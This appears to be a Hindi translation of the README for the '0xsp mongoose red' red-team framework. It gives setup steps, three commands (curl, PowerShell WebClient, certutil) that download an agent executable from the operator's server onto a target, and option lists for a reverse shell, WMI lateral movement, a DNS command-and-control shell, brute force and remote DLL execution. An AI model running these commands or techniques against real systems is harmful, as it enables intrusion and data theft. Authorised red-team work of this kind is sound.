
साइबर सुरक्षा सिमुलेशन और रेड टीमिंग संचालन के लिए एक अनूठा ढांचा, नई कमजोरियों, गलत कॉन्फ़िगरेशन और विशेषाधिकार वृद्धि हमलों के लिए विंडोज ऑडिटिंग, एक नेटवर्क में एक उन्नत प्रतिद्वंद्वी की रणनीति और तकनीकों का अनुकरण करें।
निरंतर विकास के लिए परियोजना का समर्थन करें (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
वर्तमान संस्करण 2.2.0
0xsp mongoose red संस्करण साइबर सुरक्षा सिमुलेशन के दौरान आपकी आवश्यकताओं की सहायता के लिए प्रदान किया गया है। इस संस्करण का उपयोग करके, आप लक्षित विंडोज ऑपरेटिंग सिस्टम का सिस्टम कमजोरियों, गलत कॉन्फ़िगरेशन और विशेषाधिकार वृद्धि हमलों के लिए ऑडिट कर सकते हैं, और नेटवर्क में एक उन्नत प्रतिद्वंद्वी की रणनीति और तकनीकों की नकल कर सकते हैं।
वेब एप्लिकेशन API के लिए node js समर्थन के साथ, समय पर स्थापना और अनुकूलन अधिक आसान हो जाता है। विंडोज सेंसर एजेंट, परिणाम स्थानांतरित करने और द्विदिश तकनीक के रूप में कमांड प्राप्त करने के लिए एप्लिकेशन API के साथ संवाद करेगा।
एजेंट windows update api और exploit database definitions मॉड्यूल का उपयोग करके विंडोज एक्सप्लॉइट्स की पहचान और पता लगाने में सक्षम है। नया रिलीज़ निम्नलिखित कमजोरियों का भी पता लगाएगा।
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
डिफ़ॉल्ट एक्सेस क्रेडेंशियल्स :
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#example 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#example 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#example 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --विंडोज सेवाओं और स्थापित ड्राइवरों को पुनर्प्राप्त करें।
-u --उपयोगकर्ताओं, समूहों, भूमिकाओं के बारे में जानकारी पुनर्प्राप्त करें।
-c --एक्सटेंशन द्वारा संवेदनशील कॉन्फ़िग फ़ाइलों के लिए कनेक्टेड ड्राइवरों की खोज करें।
-n --नेटवर्क जानकारी, नेटवर्क इंटरफ़ेस, कनेक्शन विवरण पुनर्प्राप्त करें।
-w --लिखने योग्य निर्देशिकाओं की गणना करें, एक्सेस अनुमति जांच, संशोधित अनुमतियाँ।
-i --विंडोज सिस्टम जानकारी, सत्र, सदैव उन्नत जांच की गणना करें।
-l --किसी फ़ाइल में विशिष्ट स्ट्रिंग खोजें, उदा: agent.exe -l c:\ password *.config।
-o --nodejs एप्लिकेशन का होस्ट पता निर्दिष्ट करें, आप srvhost का भी उपयोग कर सकते हैं
-p --स्थापित सॉफ्टवेयर, चल रही प्रक्रियाएँ, कार्यों की गणना करें।
-e --कर्नेल निरीक्षण उपकरण, यह विंडोज कर्नेल कमजोरियों के लिए टूल डेटाबेस में खोजने में मदद करेगा
-x --node js एप्लिकेशन के साथ अपने कनेक्शन को अधिकृत करने के लिए पासवर्ड।
-d --लक्ष्य मशीन में सीधे फ़ाइलें डाउनलोड करें।
-t --लक्ष्य मशीन से node js एप्लिकेशन में फ़ाइलें अपलोड करें।
-spooler --एकल होस्ट या होस्ट की सूची को संभावित CVE-2021-1675 के लिए स्कैन करें (जैसे -spooler -srvhost या -spooler -hosts )
-m --सभी ज्ञात स्कैन प्रकार एक साथ चलाएँ।
[!] रेड टीमिंग रणनीति अनुभाग
-r --विशिष्ट खाते के साथ रिवर्स शेल उत्पन्न करें।
-lr --WMI का उपयोग करके पार्श्व आंदोलन तकनीक (जैसे -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --नेटवर्क खोज और शेयर गणना
-dns --इंटरैक्टिव DNS C2C शेल स्थापित करें
-cmd --HTTP शेल के माध्यम से कमांड स्थानांतरित करें
-interactive --इंटरैक्टिव मोड प्रारंभ करें (जैसे: प्लगइन्स लोड करना ..आदि)
-username --विशिष्ट हमला मॉड्यूल के लिए पहचान प्रमाणीकरण।
-password --विशिष्ट हमला मॉड्यूल के लिए पहचान प्रमाणीकरण।
-host --हमला करने के लिए रिमोट होस्ट की पहचान करें।
-srvhost --node js एप्लिकेशन का rhost सेट करें।
-bf --स्थानीय उपयोगकर्ता / डोमेन उपयोगकर्ता ब्रूटफोर्स मॉड्यूल
-import --स्थानीय रूप से dll फ़ाइल आयात और निष्पादित करें
-remote --रिमोट होस्ट से dll फ़ाइल आयात और निष्पादित करें
https://0xsp.com/security%20dev/0xsp-mongoose-red
नए ट्यूटोरियल और ट्रिक्स प्रकाशित होने पर सूचित होने के लिए निम्नलिखित चैनल को सब्सक्राइब करना सुनिश्चित करें। https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg